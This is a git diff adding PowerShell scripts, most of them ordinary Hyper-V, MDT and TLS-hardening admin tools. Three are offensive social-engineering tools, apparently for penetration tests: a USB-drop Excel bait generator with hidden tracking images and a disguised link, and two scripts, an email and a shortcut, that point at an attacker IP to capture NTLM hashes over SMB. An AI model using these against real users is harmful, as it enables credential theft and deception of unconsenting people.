diff --git a/Hyper-V/New-DifferencingVM.ps1 b/Hyper-V/New-DifferencingVM.ps1 new file mode 100644 index 0000000..9d7bf9a --- /dev/null +++ b/Hyper-V/New-DifferencingVM.ps1 @@ -0,0 +1,126 @@ +function New-DifferencingVM +<# +.SYNOPSIS + + Function to create a Virtual machine based on a parent vhd - aka differencing disk. + NOTE - Default ParentVHD paths are hard-coded. These must be either changed manually or you need to specify -parentvhd + + Author: Oddvar Moe + Required Dependencies: Hyper-v module + +.DESCRIPTION + + Function to create a Virtual machine based on a parent vhd - aka differencing disk + NOTE - Default ParentVHD paths are hard-coded. These must be either changed manually or you need to specify -parentvhd + +.EXAMPLE + New-DifferencingVM -VMName Customer1 -VMLocation "D:\VirtualMachines" -VMNetwork EXT-Wireless -VMOS Windows10 -VMMemory 2048MB -VMDiskSize 60GB +#> +{ + [CmdletBinding(DefaultParameterSetName="VMOS")] + [Alias()] + [OutputType([int])] + Param + ( + [Parameter(Mandatory=$true, + ValueFromPipelineByPropertyName=$true)] + $VMName, + + [Parameter(Mandatory=$true,ParameterSetName="VMOS")] + [ValidateSet("Windows10","Server2012R2")] + $VMOS, + + [Parameter(Mandatory=$false)] + $VMLocation="D:\VirtualMachines", + + [Parameter(Mandatory=$false,ParameterSetName="ParentVHDPath")] + $ParentVHD, + + #A valid format is 2048MB, Default is 2048MB + [Parameter(Mandatory=$false)] + $VMMemory=2048MB, + + #A valid format is 60GB + [Parameter(Mandatory=$false)] + $VMDiskSize=60GB, + + #Option to select VM Generation + [Parameter(Mandatory=$false)] + [ValidateSet("1","2")] + $VMGeneration = "1" + ) + DynamicParam + { + # Sets the dynamic parameters name + $ParameterName = 'VMNetwork' + + # Create a dictionary + $RuntimeParameterDictionary = New-Object System.Management.Automation.RuntimeDefinedParameterDictionary + + # Create a collection of attributes + $AttributeCollection = New-Object System.Collections.ObjectModel.Collection[System.Attribute] + + # Create and set the parameters' attributes + $ParameterAttribute = New-Object System.Management.Automation.ParameterAttribute + $ParameterAttribute.ValueFromPipeline = $true + $ParameterAttribute.ValueFromPipelineByPropertyName = $true + $ParameterAttribute.Mandatory = $true + + # Add the attributes to the attributes collection + $AttributeCollection.Add($ParameterAttribute) + + # Generate and set the ValidateSet + $arrSet = (Get-VMSwitch).Name + $ValidateSetAttribute = New-Object System.Management.Automation.ValidateSetAttribute($arrSet) + + # Add the ValidateSet to the attributes collection + $AttributeCollection.Add($ValidateSetAttribute) + + # Create and return the dynamic parameter + $RuntimeParameter = New-Object System.Management.Automation.RuntimeDefinedParameter($ParameterName, [string], $AttributeCollection) + $RuntimeParameterDictionary.Add($ParameterName, $RuntimeParameter) + return $RuntimeParameterDictionary + } + + Begin + { + #To bind the dynamic parameter to a variable + $VMNetwork = $PsBoundParameters[$ParameterName] + } + Process + { + if ($PSCmdlet.ParameterSetName -eq "VMOS") { + if($VMOS -eq "Windows10") + { + $ParentVHD = "D:\HYPERV-MasterImages\Win10Ent1607x64MasterDisk\Win10Ent1607x64MasterDisk.vhdx" + } + + if($VMOS -eq "Server2012R2") + { + $ParentVHD = "D:\HYPERV-MasterImages\Server2012R2\Server2012R2.vhdx" + } + } + + try + { + New-VM -Name $VMName -MemoryStartupBytes $VMMemory -SwitchName $VMNetwork -Path $VMLocation -NoVHD -Generation $VMGeneration + New-VHD -ParentPath $ParentVHD -Differencing -Path "$VMLocation\$VMName\Virtual Hard Disks\$VMName-Disk1.vhdx" -SizeBytes $VMDiskSize + Add-VMHardDiskDrive -VMName $VMName -Path "$VMLocation\$VMName\Virtual Hard Disks\$VMName-Disk1.vhdx" + + #Correct boot order on Gen2 VMs + if ($VMGeneration -eq "2") { + Set-VMFirmware $VMName -BootOrder (Get-VMHardDiskDrive $VMName),(Get-VMNetworkAdapter $VMName) + } + } + catch + { + return $_.Exception.Message + } + finally + { + } + } + End + { + } +} \ No newline at end of file diff --git a/Hyper-V/Remove-VirtualMachine.ps1 b/Hyper-V/Remove-VirtualMachine.ps1 new file mode 100644 index 0000000..3b13710 --- /dev/null +++ b/Hyper-V/Remove-VirtualMachine.ps1 @@ -0,0 +1,82 @@ +Function Remove-VirtualMachine +<# +.Synopsis + Function to remove Virtual machine and files. Gets VM names dynamically. + Author: Oddvar Moe + Required Dependencies: Hyper-v module +.DESCRIPTION + Function to remove Virtual machine and files. Gets VM names dynamically. +.EXAMPLE + PS C:\> Remove-VirtualMachine -VMName AAA -Verbose + + Removes the virtual machine named AAA +#> +{ + [CmdletBinding()] + Param() + DynamicParam + { + # Sets the dynamic parameters name + $ParameterName = 'VMName' + + # Create a dictionary + $RuntimeParameterDictionary = New-Object System.Management.Automation.RuntimeDefinedParameterDictionary + + # Create a collection of attributes + $AttributeCollection = New-Object System.Collections.ObjectModel.Collection[System.Attribute] + + # Create and set the parameters' attributes + $ParameterAttribute = New-Object System.Management.Automation.ParameterAttribute + $ParameterAttribute.ValueFromPipeline = $true + $ParameterAttribute.ValueFromPipelineByPropertyName = $true + $ParameterAttribute.Mandatory = $true + + # Add the attributes to the attributes collection + $AttributeCollection.Add($ParameterAttribute) + + # Generate and set the ValidateSet + $arrSet = (Get-Vm).Name + $ValidateSetAttribute = New-Object System.Management.Automation.ValidateSetAttribute($arrSet) + + # Add the ValidateSet to the attributes collection + $AttributeCollection.Add($ValidateSetAttribute) + + # Create and return the dynamic parameter + $RuntimeParameter = New-Object System.Management.Automation.RuntimeDefinedParameter($ParameterName, [string], $AttributeCollection) + $RuntimeParameterDictionary.Add($ParameterName, $RuntimeParameter) + return $RuntimeParameterDictionary + } + + Begin + { + #To bind the dynamic parameter to a variable + $VMName = $PsBoundParameters[$ParameterName] + } + Process + { + try + { + $VM = Get-VM -Name $VMName + $disks = Get-VHD -VMId $vm.Id + + Write-Verbose "Removing snapshots if any" + Remove-VMSnapshot -VMName $VMName –IncludeAllChildSnapshots + Write-Verbose "Removing virtual harddrive" + Remove-Item $disks.path -Force + Write-Verbose "Removing VM" + Remove-vm -Name $VMName -Force + Write-Verbose "Removing VM files and folders" + Remove-item -path $VM.path -Recurse -force + } + catch + { + return $_.Exception.Message + } + finally + { + } + } + End + { + } +} \ No newline at end of file diff --git a/MDT/UpdateOSImage_1.1.ps1 b/MDT/UpdateOSImage_1.1.ps1 new file mode 100644 index 0000000..32e649a --- /dev/null +++ b/MDT/UpdateOSImage_1.1.ps1 @@ -0,0 +1,89 @@ +# Auto update OS Image +# Author: Oddvar Moe - msitpros.com +# Require: PowerCLI from Vmware +# Require: You need to copy litetouchpe_x86 iso to the correct datastore on vmware +# Require: Change $PSEmailServer and $EmailFrom in Sendmail function + +$Mailto = "your.account@customer.com" + +$isopath = "[VMware_Datastore.0] ISO\LiteTouchPE_x86.iso" +$networkname = "Customer-network" +$resourcepool = "HA Cluster" + +$MDTOSFolder = "E:\Deploymentshare\Operating Systems\Windows 10 X64 Enterprise - Deployment Image" +$MDTBuilOSdFolder = "E:\BuildDeployment\Captures" + + +# Function to ADD PowerCli as module +function Import-PowerCLI { + Add-PSSnapin vmware* + if (Get-Item 'C:\Program Files (x86)' -ErrorAction SilentlyContinue) { + . "C:\Program Files (x86)\VMware\Infrastructure\vSphere PowerCLI\Scripts\Initialize-PowerCLIEnvironment.ps1" + } + else { + . "C:\Program Files\VMware\Infrastructure\vSphere PowerCLI\Scripts\Initialize-PowerCLIEnvironment.ps1" + } +} + +function SendMail{ +param( +[string]$emailto +) + +[string]$PSEmailServer = "Exchange.customer.com" +[string]$EmailFrom = "MDT " + +[string]$emailbody = @" + + + + + +Hi.
+A new image has been created and has been added to the deployment solution. +
+

+Best regards +
+MDT Powershell script + + + + +"@ + +Send-MailMessage -To $emailto -Subject "MDT image was updated" -Body $emailbody -From $EmailFrom -Priority Normal -SmtpServer $PSEmailServer -encoding UTF8 -BodyAsHtml +} + +#### SCRIPT STARTS HERE #### +Import-PowerCLI + +#Remove all WIMs before starting +get-childitem $MDTBuilOSdFolder | remove-item + +# Connect to virtual center and start VM +Connect-VIServer -Server 192.168.100.10 + +new-vm -name "AUTOMDTOSDBUILD" -DiskMB 60000 -MemoryMB 6000 -ResourcePool $resourcepool -Version v8 -numCpu 2 -GuestID "windows8_64Guest" +get-vm -Name "AUTOMDTOSDBUILD" | get-networkadapter | Set-NetworkAdapter -NetworkName $networkname -type "E1000" -Confirm:$false +$cd = New-CDDrive -VM "AUTOMDTOSDBUILD" -ISOPath $isopath +Set-CDDrive -CD $cd -StartConnected $true -Confirm:$false +Start-VM -VM "AUTOMDTOSDBUILD" + +$VM = get-vm -name "AUTOMDTOSDBUILD" + +while ((get-vm -name "AUTOMDTOSDBUILD").PowerState -eq "PoweredOn") +{ + write-host "Still deploying and alive - pausing script for 180 seconds - be patient" -ForegroundColor Green + sleep 180 +} + +#Remove the VM +Remove-VM -VM "AUTOMDTOSDBUILD" -DeletePermanently -Confirm:$false + +#Check for WIM file and replace it +$NewWim = Get-childItem $MDTBuilOSdFolder +if($NewWim){move-item $NewWim.FullName $MDTOSFolder -force} + +#Send mail when done +SendMail -emailto $Mailto diff --git a/Security/Disable-Legacy-Protocols-and-Ciphers.1.0.ps1 b/Security/Disable-Legacy-Protocols-and-Ciphers.1.0.ps1 new file mode 100644 index 0000000..b669035 --- /dev/null +++ b/Security/Disable-Legacy-Protocols-and-Ciphers.1.0.ps1 @@ -0,0 +1,74 @@ +<# + Author: Oddvar Moe [MVP] + Webpage: http://msitpros.com + + Disables RC4 Windows servers + Requires Hotfix on olders server os (pre 2012R2) + https://support.microsoft.com/en-us/kb/2868725 + + Disables SSL3.0, SSL2.0 and TLS1.0 + Both Client and Server side +#> + +#Check if you are running elevated +If (-NOT ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole(` + [Security.Principal.WindowsBuiltInRole] "Administrator")) +{ + Write-Warning "You need to run this script from an elevated PowerShell prompt!`nPlease start the Script as an Administrator" + Break +} + +#### Disable RC4 #### +Write-host "Disabling RC4 Ciphers" +$RC4CipherRootKey = "HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Ciphers\" +# $([char]0x2215) in order to have / in name +$Keyname1 = "RC4 56$([char]0x2215)128" +$Keyname2 = "RC4 40$([char]0x2215)128" +$Keyname3 = "RC4 128$([char]0x2215)128" + +New-Item $RC4CipherRootKey$Keyname1 -Force +New-Item $RC4CipherRootKey$Keyname2 -Force +New-Item $RC4CipherRootKey$Keyname3 -Force + + +Set-ItemProperty $RC4CipherRootKey$Keyname1 -Name Enabled -Value 0 -Type Dword +Set-ItemProperty $RC4CipherRootKey$Keyname2 -Name Enabled -Value 0 -Type Dword +Set-ItemProperty $RC4CipherRootKey$Keyname3 -Name Enabled -Value 0 -Type Dword +#### End Disable RC4 #### + + +#### Disable SSL3.0 #### +write-host "Disabling SSL3.0 protocol" +$SSL3MainKey = "HKLM:\System\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 3.0" + +New-Item "$SSL3MainKey\Client\" -Force +Set-ItemProperty "$SSL3MainKey\Client\" -Name "DisabledByDefault" -Value 1 -Type Dword + +New-Item "$SSL3MainKey\Server\" -Force +Set-ItemProperty "$SSL3MainKey\Server\" -Name "Enabled" -Value 0 -Type Dword +#### End Disable SSL3.0 #### + + +#### Disable SSL2.0 #### +write-host "Disabling SSL2.0 protocol" +$SSL2MainKey = "HKLM:\System\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\SSL 2.0" + +New-Item "$SSL2MainKey\Client\" -Force +Set-ItemProperty "$SSL2MainKey\Client\" -Name "DisabledByDefault" -Value 1 -Type Dword + +New-Item "$SSL2MainKey\Server\" -Force +Set-ItemProperty "$SSL2MainKey\Server\" -Name "Enabled" -Value 0 -Type Dword +#### End Disable SSL2.0 #### + + +#### Disable TLS1.0 #### +write-host "Disabling TLS1.0 protocol" +$TLS1MainKey = "HKLM:\System\CurrentControlSet\Control\SecurityProviders\SCHANNEL\Protocols\TLS 1.0" + +New-Item "$TLS1MainKey\Client\" -Force +Set-ItemProperty "$TLS1MainKey\Client\" -Name "DisabledByDefault" -Value 1 -Type Dword + +New-Item "$TLS1MainKey\Server\" -Force +Set-ItemProperty "$TLS1MainKey\Server\" -Name "Enabled" -Value 0 -Type Dword +#### End Disable TLS1.0 #### +Write-host "Done!" diff --git a/Security/Generate-PhishingBait.1.0.ps1 b/Security/Generate-PhishingBait.1.0.ps1 new file mode 100644 index 0000000..0a63104 --- /dev/null +++ b/Security/Generate-PhishingBait.1.0.ps1 @@ -0,0 +1,112 @@ +#Author: Oddvar Moe - msitpros.com +#USB Stick production SE-test +#Excel needs to be installed on machine running script +#Creates an Excel Cheat with tracking mecanishm +#Example in script uses New Company Organization + +# REMEMBER TO CHANGE $pictureURL and line 81 where to point click url. + +# Place to generate content +$RootFolder = "C:\tempfolder" + +# Number to Generate +$NumberOfMemsticks = 20 + +# Filename to be placed on USB Stick +$filename = "New Organization-Draft_1.0-withComments.xlsx" + +#Path to USB Stick +$USBstickDrive = "E:\" + +# Excel Constants +# MsoTriState +Set-Variable msoFalse 0 -Option Constant -ErrorAction SilentlyContinue +Set-Variable msoTrue 1 -Option Constant -ErrorAction SilentlyContinue + +function Pause +{ + #Used to pause the script to change USB stick between copy job + Read-Host 'Insert next USB stick and then press Enter to continue…' | Out-Null +} + + +#Loop variable +$i = 1 +do +{ + #URL from where you load picture + $pictureURL = "http://msitpros.com/tracker$i.jpg" + + write-host $pictureURL + $subfolder = "$RootFolder\$i" + mkdir $subfolder + cd $subfolder + + #Code borrowed from Scripting Guy - Thanx + # cell width and height in points + Set-Variable cellWidth 10 -Option Constant -ErrorAction SilentlyContinue + Set-Variable cellHeight 10 -Option Constant -ErrorAction SilentlyContinue + + + $xl = New-Object -ComObject Excel.Application -Property @{ + Visible = $true + DisplayAlerts = $false + } + + $wb = $xl.WorkBooks.Add() + $sh = $wb.Sheets.Item(‘Sheet1’) + + # arguments to insert the image through the Shapes.AddPicture Method + $LinkToFile = $msoTrue + $SaveWithDocument = $msoTrue + + # Place picture at Column GS-ish to hide it + $Left = $cellWidth * 10000 + $Top = $cellHeight * 1 + $Width = $cellWidth * 10 + $Height = $cellHeight * 10 + + # add the image to the Sheet + $img = $sh.Shapes.AddPicture($PictureURL, $LinkToFile, $SaveWithDocument, $Left, $Top, $Width, $Height) + + # add trick text + #Number 1 is vertical + #Number 2 is horizontal + $sh.Cells.Item(1,1)="Content moved to Internal Sharepoint site" + $sh.Cells.Item(1,1).font.size = 18 + $sh.Cells.Item(1,1).font.bold = $true + + $range = $xl.Range("A2") + # Fake link to measure if the user clicks + $sh.Hyperlinks.Add($range,"http://8.8.8.8/$i/neworg.xls","","http://sharepoint.msitpros.com/organizationchart","LINK") + $sh.Cells.item(2,1).font.bold = $true + $sh.Cells.item(2,1).font.size = 22 + + #Increase size of document + $range2 = $sh.Range("A3","Z1000") + $range2.Font.Bold = $true + + $file = "$subfolder\$filename" + $xl.ActiveWorkbook.SaveAs($file) + + $wb.Close($false) + $xl.Quit() + + $i++ +} +until ($i -gt $NumberOfMemsticks) + + +# Copy to USB stick and remove temporary file +$ii = 1 +do +{ + $subfolder = "$RootFolder\$ii" + $file = "$subfolder\$filename" + + Copy-Item $file $USBstickDrive + Remove-Item $subfolder -Force -Recurse + pause + $ii++ +} +until ($ii -gt $NumberOfMemsticks) diff --git a/Security/SMBCapture-Outlook.1.1.ps1 b/Security/SMBCapture-Outlook.1.1.ps1 new file mode 100644 index 0000000..b3602c5 --- /dev/null +++ b/Security/SMBCapture-Outlook.1.1.ps1 @@ -0,0 +1,28 @@ +# Author: Oddvar Moe +# https://msitpros.com +# version: 1.1 + +# Script uses Outlook so you need to have an active Outlook profile on the machine the script is running on. + +#If multiple recipients use ; as seperator" +$Recipient = "john.doe@contoso.com" +$AttackerIP = "192.168.0.100" + +$file1="\\$AttackerIP\PictureFolder\coolPicture.png" +$Outlook = New-Object -comObject Outlook.Application +$newmail = $Outlook.CreateItem(0) +$newmail.Recipients.Add($Recipient) | Out-Null +$newmail.Subject = "Funny Pictures" +$newmail.HTMLBody = @" + + + + +Hi. Check out this funny picture
+ + + +"@ + +$newmail.Send() +#$Outlook.Quit() \ No newline at end of file diff --git a/Security/SMBCapture-ShortcutGenerator.1.1.ps1 b/Security/SMBCapture-ShortcutGenerator.1.1.ps1 new file mode 100644 index 0000000..d2be1c4 --- /dev/null +++ b/Security/SMBCapture-ShortcutGenerator.1.1.ps1 @@ -0,0 +1,9 @@ +# Author: Oddvar Moe +# https://msitpros.com +# Version: 1.0 +$AttackerMachine = "192.168.0.100" +$WshShell = New-Object -comObject WScript.Shell +$Shortcut = $WshShell.CreateShortcut("$Home\Desktop\Regedit.lnk") +$Shortcut.TargetPath = "C:\windows\regedit.exe" +$Shortcut.Iconlocation = "\\$AttackerMachine\icons\icon.png,0" +$Shortcut.Save()